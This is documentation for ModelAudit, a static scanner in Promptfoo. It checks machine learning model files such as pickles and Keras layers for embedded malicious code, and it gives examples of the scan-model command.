Model Scanning
Overview
ModelAudit is a lightweight static security scanner for machine learning models integrated into Promptfoo. It allows you to quickly scan your AIML models for potential security risks before deploying them in production environments.
By invoking promptfoo scan-model
, you can use ModelAudit's static security scanning capabilities.
Purpose
AI/ML models can introduce security risks through:
- Malicious code embedded in pickled models
- Suspicious TensorFlow operations
- Potentially unsafe Keras Lambda layers
- Encoded payloads hidden in model structures
- Risky configurations in model architectures
ModelAudit helps identify these risks before models are deployed to production environments, ensuring a more secure AI pipeline.
Usage
Basic Command Structure
promptfoo scan-model [OPTIONS] PATH...
Examples
# Scan a single model file
promptfoo scan-model model.pkl
# Scan multiple models and directories
promptfoo scan-model model.pkl model2.h5 models_directory
# Export results to JSON
promptfoo scan-model model.pkl --format json --output results.json
# Add custom blacklist patterns
promptfoo scan-model model.pkl --blacklist "unsafe_model" --blacklist "malicious_net"